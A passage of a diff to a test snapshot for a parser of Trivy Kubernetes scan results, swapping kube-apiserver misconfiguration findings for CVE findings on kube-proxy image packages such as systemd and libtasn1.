attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0021", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0022", - ], - }, - "category": "Misconfiguration", - "description": "Rotate log files on reaching 100 MB or as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", - "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0022", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], "severity": "LOW", @@ -112021,57 +111679,37 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -112079,57 +111717,37 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", @@ -112137,1118 +111755,992 @@ exports[`should parse a trivy-k8s scan result of a cluster running secureCodeBox { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://github.com/kastel-security/Journald", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "4.13-3+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.8.2-beta.1", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-2253", - "installedVersion": "v2.8.1+incompatible", - "packageName": "github.com/docker/distribution", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2253", - "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", - "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", - "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", - "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", - "https://www.cve.org/CVERecord?id=CVE-2023-2253", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the \`/v2/_catalog\` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: \`n\`). This vulnerability allows a malicious user to submit an unreasonably large value for \`n,\` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "DoS from malicious API request", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2253", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2253", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2253", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-1000654", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "http://www.securityfocus.com/bid/105151", + "https://access.redhat.com/security/cve/CVE-2018-1000654", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "https://gitlab.com/gnutls/libtasn1/issues/4", + 